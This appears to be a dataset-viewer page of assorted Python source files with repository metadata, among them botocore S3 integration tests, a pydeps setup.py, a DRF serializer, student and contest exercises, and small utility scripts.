'GL_TEXTURE5_ARB', 'GL_TEXTURE6_ARB', 'GL_TEXTURE7_ARB', 'GL_TEXTURE8_ARB',
'GL_TEXTURE9_ARB', 'GL_TEXTURE10_ARB', 'GL_TEXTURE11_ARB', 'GL_TEXTURE12_ARB',
'GL_TEXTURE13_ARB', 'GL_TEXTURE14_ARB', 'GL_TEXTURE15_ARB',
'GL_TEXTURE16_ARB', 'GL_TEXTURE17_ARB', 'GL_TEXTURE18_ARB',
'GL_TEXTURE19_ARB', 'GL_TEXTURE20_ARB', 'GL_TEXTURE21_ARB',
'GL_TEXTURE22_ARB', 'GL_TEXTURE23_ARB', 'GL_TEXTURE24_ARB',
'GL_TEXTURE25_ARB', 'GL_TEXTURE26_ARB', 'GL_TEXTURE27_ARB',
'GL_TEXTURE28_ARB', 'GL_TEXTURE29_ARB', 'GL_TEXTURE30_ARB',
'GL_TEXTURE31_ARB', 'GL_ACTIVE_TEXTURE_ARB', 'GL_CLIENT_ACTIVE_TEXTURE_ARB',
'GL_MAX_TEXTURE_UNITS_ARB', 'glActiveTextureARB', 'glClientActiveTextureARB',
'glMultiTexCoord1dARB', 'glMultiTexCoord1dvARB', 'glMultiTexCoord1fARB',
'glMultiTexCoord1fvARB', 'glMultiTexCoord1iARB', 'glMultiTexCoord1ivARB',
'glMultiTexCoord1sARB', 'glMultiTexCoord1svARB', 'glMultiTexCoord2dARB',
'glMultiTexCoord2dvARB', 'glMultiTexCoord2fARB', 'glMultiTexCoord2fvARB',
'glMultiTexCoord2iARB', 'glMultiTexCoord2ivARB', 'glMultiTexCoord2sARB',
'glMultiTexCoord2svARB', 'glMultiTexCoord3dARB', 'glMultiTexCoord3dvARB',
'glMultiTexCoord3fARB', 'glMultiTexCoord3fvARB', 'glMultiTexCoord3iARB',
'glMultiTexCoord3ivARB', 'glMultiTexCoord3sARB', 'glMultiTexCoord3svARB',
'glMultiTexCoord4dARB', 'glMultiTexCoord4dvARB', 'glMultiTexCoord4fARB',
'glMultiTexCoord4fvARB', 'glMultiTexCoord4iARB', 'glMultiTexCoord4ivARB',
'glMultiTexCoord4sARB', 'glMultiTexCoord4svARB', 'PFNGLACTIVETEXTUREARBPROC',
'PFNGLCLIENTACTIVETEXTUREARBPROC', 'PFNGLMULTITEXCOORD1DARBPROC',
'PFNGLMULTITEXCOORD1DVARBPROC', 'PFNGLMULTITEXCOORD1FARBPROC',
'PFNGLMULTITEXCOORD1FVARBPROC', 'PFNGLMULTITEXCOORD1IARBPROC',
'PFNGLMULTITEXCOORD1IVARBPROC', 'PFNGLMULTITEXCOORD1SARBPROC',
'PFNGLMULTITEXCOORD1SVARBPROC', 'PFNGLMULTITEXCOORD2DARBPROC',
'PFNGLMULTITEXCOORD2DVARBPROC', 'PFNGLMULTITEXCOORD2FARBPROC',
'PFNGLMULTITEXCOORD2FVARBPROC', 'PFNGLMULTITEXCOORD2IARBPROC',
'PFNGLMULTITEXCOORD2IVARBPROC', 'PFNGLMULTITEXCOORD2SARBPROC',
'PFNGLMULTITEXCOORD2SVARBPROC', 'PFNGLMULTITEXCOORD3DARBPROC',
'PFNGLMULTITEXCOORD3DVARBPROC', 'PFNGLMULTITEXCOORD3FARBPROC',
'PFNGLMULTITEXCOORD3FVARBPROC', 'PFNGLMULTITEXCOORD3IARBPROC',
'PFNGLMULTITEXCOORD3IVARBPROC', 'PFNGLMULTITEXCOORD3SARBPROC',
'PFNGLMULTITEXCOORD3SVARBPROC', 'PFNGLMULTITEXCOORD4DARBPROC',
'PFNGLMULTITEXCOORD4DVARBPROC', 'PFNGLMULTITEXCOORD4FARBPROC',
'PFNGLMULTITEXCOORD4FVARBPROC', 'PFNGLMULTITEXCOORD4IARBPROC',
'PFNGLMULTITEXCOORD4IVARBPROC', 'PFNGLMULTITEXCOORD4SARBPROC',
'PFNGLMULTITEXCOORD4SVARBPROC', 'GL_MESA_shader_debug',
'GL_DEBUG_OBJECT_MESA', 'GL_DEBUG_PRINT_MESA', 'GL_DEBUG_ASSERT_MESA',
'glCreateDebugObjectMESA', 'glClearDebugLogMESA', 'glGetDebugLogMESA',
'glGetDebugLogLengthMESA', 'GL_MESA_packed_depth_stencil',
'GL_DEPTH_STENCIL_MESA', 'GL_UNSIGNED_INT_24_8_MESA',
'GL_UNSIGNED_INT_8_24_REV_MESA', 'GL_UNSIGNED_SHORT_15_1_MESA',
'GL_UNSIGNED_SHORT_1_15_REV_MESA', 'GL_MESA_program_debug',
'GL_FRAGMENT_PROGRAM_POSITION_MESA', 'GL_FRAGMENT_PROGRAM_CALLBACK_MESA',
'GL_FRAGMENT_PROGRAM_CALLBACK_FUNC_MESA',
'GL_FRAGMENT_PROGRAM_CALLBACK_DATA_MESA', 'GL_VERTEX_PROGRAM_POSITION_MESA',
'GL_VERTEX_PROGRAM_CALLBACK_MESA', 'GL_VERTEX_PROGRAM_CALLBACK_FUNC_MESA',
'GL_VERTEX_PROGRAM_CALLBACK_DATA_MESA', 'GLprogramcallbackMESA',
'glProgramCallbackMESA', 'glGetProgramRegisterfvMESA',
'GL_MESA_texture_array', 'GL_ATI_blend_equation_separate',
'GL_ALPHA_BLEND_EQUATION_ATI', 'glBlendEquationSeparateATI',
'PFNGLBLENDEQUATIONSEPARATEATIPROC', 'GLeglImageOES', 'GL_OES_EGL_image',
'PFNGLEGLIMAGETARGETTEXTURE2DOESPROC',
'PFNGLEGLIMAGETARGETRENDERBUFFERSTORAGEOESPROC']
# END GENERATED CONTENT (do not edit above this line)
| [
"[email protected]"
] | |
18f43854543ea9c9c8c46129f56e665c7042d7d6 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/468/usersdata/304/111685/submittedfiles/Av2_Parte3.py | 8f2fd9356f208463f08f81498b9a718876b02d30 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 390 | py | # -*- coding: utf-8 -*-
m = int(input('Quantas listas: '))
n = int(input('Qntd elemento listas: '))
for i in range (0,m,1):
lista=[]
for j in range (0,n,1):
lista.append(int(input('Elemento: ')))
media = sum(lista)/len(lista)
soma = 0
for i in range (0,(n-1),1):
soma += ((i - media))
dp = ((1/(n-1))*(soma)**2)**(1/2)
print('%.2f'%media)
print('%.2f'%dp)
| [
"[email protected]"
] | |
6ce2e5527681d74d95f3836d7b83db44985c073f | eb9f655206c43c12b497c667ba56a0d358b6bc3a | /python/testData/resolve/AugmentedAfterAugmented.py | af870d6359d0bd6f1ecb6491cd6243ee652c1cc7 | [
"Apache-2.0"
] | permissive | JetBrains/intellij-community | 2ed226e200ecc17c037dcddd4a006de56cd43941 | 05dbd4575d01a213f3f4d69aa4968473f2536142 | refs/heads/master | 2023-09-03T17:06:37.560889 | 2023-09-03T11:51:00 | 2023-09-03T12:12:27 | 2,489,216 | 16,288 | 6,635 | Apache-2.0 | 2023-09-12T07:41:58 | 2011-09-30T13:33:05 | null | UTF-8 | Python | false | false | 53 | py | foo = 1
foo += 1
while True:
foo += 2
# <ref>
| [
"[email protected]"
] | |
877c2c1ffca4cf685c39619bd5877709a434348d | 0d0ee226b655e7e665d3e7fef2aeec701f74d581 | /tests/integration/test_s3.py | 87e0d8ed54ceb00d306a916b40b333916b6578b8 | [
"MIT"
] | permissive | spcs/botocore | 435c180e93aa670ccf924a14ae776dd075d09fde | fc6b7454e5e17cfd6428b1abdffa38856d77bd25 | refs/heads/master | 2021-01-17T06:42:31.356668 | 2013-10-02T19:12:49 | 2013-10-02T19:12:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,424 | py | # Copyright (c) 2013 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
import time
import random
from tests import unittest
from collections import defaultdict
try:
from itertools import izip_longest as zip_longest
except ImportError:
from itertools import zip_longest
import botocore.session
class BaseS3Test(unittest.TestCase):
def setUp(self):
self.session = botocore.session.get_session()
self.service = self.session.get_service('s3')
self.endpoint = self.service.get_endpoint('us-east-1')
class TestS3Buckets(BaseS3Test):
def test_can_make_request(self):
# Basic smoke test to ensure we can talk to s3.
operation = self.service.get_operation('ListBuckets')
http, result = operation.call(self.endpoint)
self.assertEqual(http.status_code, 200)
# Can't really assume anything about whether or not they have buckets,
# but we can assume something about the structure of the response.
self.assertEqual(sorted(list(result.keys())),
['Buckets', 'Owner', 'ResponseMetadata'])
class TestS3Objects(BaseS3Test):
def setUp(self):
super(TestS3Objects, self).setUp()
self.bucket_name = 'botocoretest%s-%s' % (
int(time.time()), random.randint(1, 1000))
operation = self.service.get_operation('CreateBucket')
operation.call(self.endpoint, bucket=self.bucket_name)
self.keys = []
def tearDown(self):
for key in self.keys:
operation = self.service.get_operation('DeleteObject')
operation.call(self.endpoint, bucket=self.bucket_name,
key=key)
operation = self.service.get_operation('DeleteBucket')
operation.call(self.endpoint, bucket=self.bucket_name)
def create_object(self, key_name, body='foo'):
self.keys.append(key_name)
operation = self.service.get_operation('PutObject')
response = operation.call(self.endpoint, bucket=self.bucket_name, key=key_name,
body=body)[0]
self.assertEqual(response.status_code, 200)
def create_multipart_upload(self, key_name):
operation = self.service.get_operation('CreateMultipartUpload')
http_response, parsed = operation.call(self.endpoint,
bucket=self.bucket_name,
key=key_name)
upload_id = parsed['UploadId']
self.addCleanup(self.service.get_operation('AbortMultipartUpload').call,
self.endpoint, upload_id=upload_id,
bucket=self.bucket_name, key=key_name)
def test_can_delete_urlencoded_object(self):
key_name = 'a+b/foo'
self.create_object(key_name=key_name)
self.keys.pop()
bucket_contents = self.service.get_operation('ListObjects').call(
self.endpoint, bucket=self.bucket_name)[1]['Contents']
self.assertEqual(len(bucket_contents), 1)
self.assertEqual(bucket_contents[0]['Key'], 'a+b/foo')
subdir_contents = self.service.get_operation('ListObjects').call(
self.endpoint, bucket=self.bucket_name, prefix='a+b')[1]['Contents']
self.assertEqual(len(subdir_contents), 1)
self.assertEqual(subdir_contents[0]['Key'], 'a+b/foo')
operation = self.service.get_operation('DeleteObject')
response = operation.call(self.endpoint, bucket=self.bucket_name,
key=key_name)[0]
self.assertEqual(response.status_code, 204)
def test_can_paginate(self):
for i in range(5):
key_name = 'key%s' % i
self.create_object(key_name)
# Eventual consistency.
time.sleep(3)
operation = self.service.get_operation('ListObjects')
generator = operation.paginate(self.endpoint, max_keys=1,
bucket=self.bucket_name)
responses = list(generator)
self.assertEqual(len(responses), 5, responses)
data = [r[1] for r in responses]
key_names = [el['Contents'][0]['Key']
for el in data]
self.assertEqual(key_names, ['key0', 'key1', 'key2', 'key3', 'key4'])
def test_result_key_iters(self):
for i in range(5):
key_name = 'key/%s/%s' % (i, i)
self.create_object(key_name)
key_name2 = 'key/%s' % i
self.create_object(key_name2)
time.sleep(3)
operation = self.service.get_operation('ListObjects')
generator = operation.paginate(self.endpoint, max_keys=2,
prefix='key/',
delimiter='/',
bucket=self.bucket_name)
iterators = generator.result_key_iters()
response = defaultdict(list)
key_names = [i.result_key for i in iterators]
for vals in zip_longest(*iterators):
for k, val in zip(key_names, vals):
response[k].append(val)
self.assertIn('Contents', response)
self.assertIn('CommonPrefixes', response)
def test_can_get_and_put_object(self):
self.create_object('foobarbaz', body='body contents')
time.sleep(3)
operation = self.service.get_operation('GetObject')
response = operation.call(self.endpoint, bucket=self.bucket_name,
key='foobarbaz')
data = response[1]
self.assertEqual(data['Body'].read().decode('utf-8'), 'body contents')
def test_paginate_max_items(self):
self.create_multipart_upload('foo/key1')
self.create_multipart_upload('foo/key1')
self.create_multipart_upload('foo/key1')
self.create_multipart_upload('foo/key2')
self.create_multipart_upload('foobar/key1')
self.create_multipart_upload('foobar/key2')
self.create_multipart_upload('bar/key1')
self.create_multipart_upload('bar/key2')
operation = self.service.get_operation('ListMultipartUploads')
# With no max items.
pages = operation.paginate(self.endpoint, bucket=self.bucket_name)
iterators = pages.result_key_iters()
self.assertEqual(len(iterators), 1)
self.assertEqual(iterators[0].result_key, 'Uploads')
self.assertEqual(len(list(iterators[0])), 8)
# With a max items of 1.
pages = operation.paginate(self.endpoint,
max_items=1,
bucket=self.bucket_name)
iterators = pages.result_key_iters()
self.assertEqual(len(iterators), 1)
self.assertEqual(iterators[0].result_key, 'Uploads')
self.assertEqual(len(list(iterators[0])), 1)
# Works similar with build_full_result()
pages = operation.paginate(self.endpoint,
max_items=1,
bucket=self.bucket_name)
full_result = pages.build_full_result()
self.assertEqual(len(full_result['Uploads']), 1)
def test_paginate_within_page_boundaries(self):
self.create_object('a')
self.create_object('b')
self.create_object('c')
self.create_object('d')
operation = self.service.get_operation('ListObjects')
# First do it without a max keys so we're operating on a single page of
# results.
pages = operation.paginate(self.endpoint, max_items=1,
bucket=self.bucket_name)
first = pages.build_full_result()
t1 = first['NextToken']
pages = operation.paginate(self.endpoint, max_items=1,
starting_token=t1,
bucket=self.bucket_name)
second = pages.build_full_result()
t2 = second['NextToken']
pages = operation.paginate(self.endpoint, max_items=1,
starting_token=t2,
bucket=self.bucket_name)
third = pages.build_full_result()
t3 = third['NextToken']
pages = operation.paginate(self.endpoint, max_items=1,
starting_token=t3,
bucket=self.bucket_name)
fourth = pages.build_full_result()
self.assertEqual(first['Contents'][-1]['Key'], 'a')
self.assertEqual(second['Contents'][-1]['Key'], 'b')
self.assertEqual(third['Contents'][-1]['Key'], 'c')
self.assertEqual(fourth['Contents'][-1]['Key'], 'd')
def test_unicode_key_put_list(self):
# Verify we can upload a key with a unicode char and list it as well.
key_name = u'\u2713'
self.create_object(key_name)
operation = self.service.get_operation('ListObjects')
parsed = operation.call(self.endpoint, bucket=self.bucket_name)[1]
self.assertEqual(len(parsed['Contents']), 1)
self.assertEqual(parsed['Contents'][0]['Key'], key_name)
operation = self.service.get_operation('GetObject')
parsed = operation.call(self.endpoint, bucket=self.bucket_name, key=key_name)[1]
self.assertEqual(parsed['Body'].read().decode('utf-8'), 'foo')
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
8e858adedb2bd3195fa4dfb7bb2b4c6af2189603 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03910/s110121278.py | 4c9ecfd6bfbe6621fcbe2a07ea7568326440d590 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 153 | py | N = int(input())
s = 0
j = 1
for i in range(1, N+1):
s += i
if s >= N:
j = i
break
k = s - N
for i in range(1, j+1):
if i == k: continue
print(i) | [
"[email protected]"
] | |
6adc117fbecb878e659be7ef8fe69003caf90078 | 9ac91b5fca46997a484fe0dd9a9d23e01dae5c7c | /OOP/OOP3.py | 1d6abae38d36497d7429d8e9b897e612cd43503d | [] | no_license | HomeNerd/OrneklerPython7 | b03e649a3f1c9c23730a3eeb723b0df4890273f7 | 711e26917244d89cdf492df0489d02b630732215 | refs/heads/master | 2020-06-08T15:26:37.974583 | 2019-08-08T12:58:24 | 2019-08-08T12:58:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 123 | py | class KatHarita:
en_sayi = 10
boy_sayi = 10
magazametre = 50
yolmetre = 50
print(dir(KatHarita))
| [
"[email protected]"
] | |
fa1fa3378a017fe7890883215c6f4ed40f43828a | a2b696ba8edd5e6b8aa1a4c4aea19cc56e6beb66 | /api/serializers.py | d4db895abe2ac6146ca319be0a8d40433d07655a | [] | no_license | kyrios213/drf-django | 7163eeaba2f32cd0f1cfa5871718c1892a7dc83a | d61438bbb919e7ab845da14bf04cfd85d108de73 | refs/heads/main | 2023-06-05T03:19:33.440410 | 2021-06-21T03:23:46 | 2021-06-21T03:23:46 | 378,791,890 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 428 | py | from rest_framework import serializers, viewsets
from django.contrib.auth import get_user_model
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = get_user_model()
fields = ['id', 'email', 'password']
extra_kwargs = {'password': {'write_only': True, 'min_length': 8}}
def create(self, validated_data):
return get_user_model().objects.create_user(**validated_data)
| [
"[email protected]"
] | |
9132e1ad54fca3fe47ba425f3bbb3e1377737f65 | 6b6bf72694e5aa6425f11c956e4a5371b2c73e09 | /populate/main.py | bcccf70630692e0c3d23db7eb0615a5c25787907 | [] | no_license | danielspeixoto/elasticsearch-workshop | 5d9dccebb80bf58b786f167ff8eb6de8a0282a8c | 9872831361ea349453b8e202eb02880c43cbc238 | refs/heads/master | 2020-04-02T01:18:28.858625 | 2018-10-25T22:24:28 | 2018-10-25T22:24:28 | 153,848,788 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 252 | py | from helpers.Index import Index, connect
from helpers.XMLRepository import XMLRepository
connection = connect("localhost", "9200")
index = Index(connection, "meu-index")
dados = XMLRepository("./datasets/bitcoin/")
index.bulk_insert(dados.data())
| [
"[email protected]"
] | |
15aa14bd147b72e801f55c46ff70efe32d7ef80e | d6074aac6e9e5f2fa5355c3c9ddaebe892c4151d | /setup.py | 8813b411347ea2ca52a5f6274befae3a458b8877 | [
"BSD-2-Clause"
] | permissive | pombredanne/pydeps | f5aae8b825cf86db8308adad808b4bbf8cee52a2 | 95833f42f86f9c5c23ef14b675828d0ddc4df73e | refs/heads/master | 2021-01-18T07:52:41.522028 | 2016-05-19T13:53:14 | 2016-05-19T13:53:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 913 | py |
import setuptools
from distutils.core import setup
setup(
name='pydeps',
version='1.2.7',
packages=['pydeps'],
install_requires=[
'enum34'
],
long_description=open('README.rst').read(),
entry_points={
'console_scripts': [
'pydeps = pydeps.pydeps:pydeps',
]
},
url='https://github.com/thebjorn/pydeps',
license='BSD',
author='bjorn',
author_email='[email protected]',
description='Display module dependencies',
classifiers=[
'Intended Audience :: Developers',
'Natural Language :: English',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Topic :: Software Development :: Libraries :: Python Modules',
]
)
| [
"[email protected]"
] | |
1ded2999966d01cb7228a2a4f5bc86303d668757 | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /aYTLW5jmRoXhnnzwj_3.py | 9f67e5f61283ae4dd389aefbe398689d6bd08e13 | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 61 | py |
query = " select name from employees where salary > 45000"
| [
"[email protected]"
] | |
7cb57f1aee5711236c63768e429265d71ba59e80 | 21b461b71b4c63f7aac341bd12ba35d211c7956e | /codes/03_func/Graph_Permutation_isomorphic/01_test_permutation.py | 587c4d9c282ed70920f61d81d9c4546575e05260 | [] | no_license | Ziaeemehr/workshop_scripting | cebdcb552720f31fd6524fd43f257ca46baf70e2 | ed5f232f6737bc9f750d704455442f239d4f0561 | refs/heads/main | 2023-08-22T23:00:36.121267 | 2023-07-19T10:53:41 | 2023-07-19T10:53:41 | 153,342,386 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 771 | py | """
A_G = P A_H P.T
P is permutation matrix
P.T is the transpose matrix of T
"""
import numpy as np
import networkx as nx
def permutation(alpha, n):
P = np.zeros((n, n), dtype=int)
for i in range(n):
P[i][alpha[i]] = 1
return P
A_G = np.array([[0, 1, 0, 0, 0],
[1, 0, 1, 0, 1],
[0, 1, 0, 1, 1],
[0, 0, 1, 0, 1],
[0, 1, 1, 1, 0]])
A_H = np.array([[0, 1, 1, 1, 0],
[1, 0, 1, 0, 0],
[1, 1, 0, 1, 0],
[1, 0, 1, 0, 1],
[0, 0, 0, 1, 0]])
# arbitrary permutation of nodes.
alpha = [4, 3, 0, 1, 2]
P = permutation(alpha, 5)
A_Gp = np.matmul(np.matmul(P, A_H), P.T)
# check if it works?
print(np.array_equal(A_Gp, A_G))
| [
"[email protected]"
] | |
38bbf0422041425be9f4f1aac557fcfbfe23a739 | 694d57c3e512ce916269411b51adef23532420cd | /leetcode_review2/74search_a_2D_matrix.py | 866fe5944bf1f8a5a7c20dee6738ef99ba24a70b | [] | no_license | clovery410/mycode | 5541c3a99962d7949832a0859f18819f118edfba | e12025e754547d18d5bb50a9dbe5e725fd03fd9c | refs/heads/master | 2021-05-16T02:46:47.996748 | 2017-05-10T23:43:50 | 2017-05-10T23:43:50 | 39,235,141 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 421 | py | class Solution(object):
def searchMatrix(self, matrix, target):
m, n = len(matrix), len(matrix[0]) if len(matrix) > 0 else 0
cur_i, cur_j = 0, n-1
while cur_i < m and cur_j >= 0:
if target == matrix[cur_i][cur_j]:
return True
if target < matrix[cur_i][cur_j]:
cur_j -= 1
else:
cur_i += 1
return False
| [
"[email protected]"
] | |
b76b50f294cf1d7560a3699d3704b41173c7ea8c | c956401119e44e41f3873b4734c857eda957e2cd | /metrics/lr_smape.py | 8a71c4a237fb069f751070fdc252cea4f1b598f7 | [] | no_license | zhekunz2/c4pp | 6f689bce42215507d749b8b2be96c7f68ed8c49c | 9f8054addb48d9440662d8c8f494359846423ffd | refs/heads/master | 2020-09-24T06:17:29.866975 | 2019-12-03T17:41:25 | 2019-12-03T17:41:25 | 225,678,894 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 880 | py | #!/usr/bin/env python
import os
import json
import sys
import numpy as np
try:
smape_thres=float(sys.argv[1])
weight=float(sys.argv[2])
bias=float(sys.argv[3])
data_dir=sys.argv[4]
with open(os.path.join(data_dir, 'data.json')) as json_data:
d = json.load(json_data)
datas = [x for x in d.keys() if x=='x' or x=='y']
data_x = sorted(datas)[0]
data_y = sorted(datas)[1]
predict = [x * float(weight) + float(bias) for x in d[data_x]]
observe = d[data_y]
ape = np.zeros(len(observe))
for i,p in enumerate(predict):
o = observe[i]
ape[i] = abs(o - p) / ((abs(o) + abs(p)))
smape = np.mean(ape)
if abs(smape) <= smape_thres:
print('True: ' + str(smape))
else:
print('False: ' + str(smape))
except:
print('Error')
exit(0) | [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.